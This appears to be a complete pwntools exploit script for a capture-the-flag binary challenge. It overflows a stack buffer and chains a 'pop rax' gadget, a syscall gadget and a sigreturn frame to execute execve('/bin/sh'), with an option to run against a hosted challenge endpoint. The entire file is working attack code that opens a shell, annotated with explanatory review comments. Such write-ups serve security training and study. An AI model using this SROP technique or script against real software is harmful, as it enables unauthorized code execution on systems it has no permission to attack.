from pwn import *
# --- target setup -----------------------------------------------------------
# BIN=<path> on the command line selects the challenge binary (pwntools ``args``).
binary = args.BIN

# gdb.debug() opens its terminal in a horizontal tmux split.
context.terminal = ["tmux", "splitw", "-h"]

# Loading the ELF as context.binary makes context.arch/bits follow the target,
# which p64() and the sigreturn frame below rely on.
e = context.binary = ELF(binary)

# Gadget finder; note it is not referenced anywhere else in this script.
r = ROP(e)

# gdbscript executed on attach: just let the target run.
gs = "\ncontinue\n"
def start():
    """Return a pwntools tube for the target, chosen by the ``args`` flags.

    ``GDB=1``    -> run ``e.path`` under gdb with the ``gs`` script attached.
    ``REMOTE=1`` -> connect to the hosted challenge instance instead.
    otherwise    -> plain local process of ``e.path``.
    """
    target = e.path
    if args.GDB:
        return gdb.debug(target, gdbscript=gs)
    if args.REMOTE:
        # Hard-coded challenge endpoint; only reached when REMOTE is set.
        return remote('0.cloud.chals.io', 13658)
    return process(target)
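p = start()

# Gadget addresses are taken straight from the ELF symbol table and never
# rebased with a leak, so this only works against a non-PIE build.  Warn
# loudly instead of silently sending offsets as if they were addresses.
if e.pie:
    log.warning("%s is PIE; e.sym[] values are offsets, not addresses", e.path)

# The +4 skips the first instruction of each helper function -- presumably an
# ``endbr64`` -- so we return into the gadget body (``pop rax; ret`` /
# ``syscall; ret``).  TODO(review): confirm against the disassembly.
GADGET_PROLOGUE = 4
pop_rax = e.sym['pop_rax'] + GADGET_PROLOGUE
info("Pop RAX = %s", hex(pop_rax))
syscall_ret = e.sym['ret_syscall'] + GADGET_PROLOGUE
info("Syscall RET = %s", hex(syscall_ret))

# A bare next() would die with an opaque StopIteration if the string is absent;
# fail with a readable message instead (log.error raises).
bin_sh = next(e.search(b'/bin/sh'), None)
if bin_sh is None:
    log.error("no '/bin/sh' string found in %s", e.path)
info("BinSH = %s", hex(bin_sh))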
def srop_exec():
    """Build the SROP payload: ``rt_sigreturn`` into ``execve("/bin/sh", 0, 0)``.

    Layout, starting at the overwritten return address:
      pop rax; ret    <- rax = 0xf (SYS_rt_sigreturn on x86-64)
      syscall; ret    <- kernel restores every register from the frame below
      SigreturnFrame  <- rax=SYS_execve, rdi=&"/bin/sh", rsi=rdx=0, rip=syscall
    Returns the raw bytes to append after the stack padding.
    """
    trigger = b"".join([
        p64(pop_rax),
        p64(0xf),
        p64(syscall_ret),
    ])
    frame = SigreturnFrame(arch="amd64", kernel="amd64")
    frame.rax = constants.SYS_execve
    frame.rdi = bin_sh
    # Frame registers start at 0; spelled out so the NULL argv/envp are visible.
    frame.rsi = 0
    frame.rdx = 0
    frame.rip = syscall_ret
    return trigger + bytes(frame)
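# The target prints "Debug Mode Enabled; calling 0x...".  The leak is not
# needed (gadget addresses come from the non-PIE ELF), but logging it lets you
# spot a remote/local binary mismatch.  TODO(review): compare it against the
# matching e.sym entry once you know which function it names.
p.recvuntil(b'Debug Mode Enabled; calling ')
debug_mode = int(p.recvline(), 16)  # base 16 accepts "0x" and the trailing newline
info("Leaked address = %s", hex(debug_mode))

# Bytes from the start of the overflowing buffer to the saved return address.
# Presumably found with cyclic()/cyclic_find(); hard-coded for this binary.
RET_OFFSET = 16
pad = cyclic(RET_OFFSET)

chain = srop_exec()
# NOTE(review): sendline() appends '\n'.  If the target reads with a
# newline-terminated primitive (gets/fgets), any 0x0a byte inside the frame
# would truncate the payload -- confirm the read primitive if this fails.
p.sendline(pad + chain)
p.interactive()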